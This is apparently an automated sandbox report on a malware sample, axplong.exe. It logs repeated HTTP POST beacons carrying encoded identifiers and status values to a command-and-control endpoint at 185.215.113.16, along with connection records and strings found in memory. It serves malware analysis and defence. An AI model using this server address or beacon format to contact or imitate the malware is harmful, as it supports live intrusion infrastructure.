                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownDNS traffic detected: query: 15.164.165.52.in-addr.arpa replaycode: Name error (3)
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 4_2_0050BD60 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile,4_2_0050BD60
                    Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.2
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.1
                    Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo
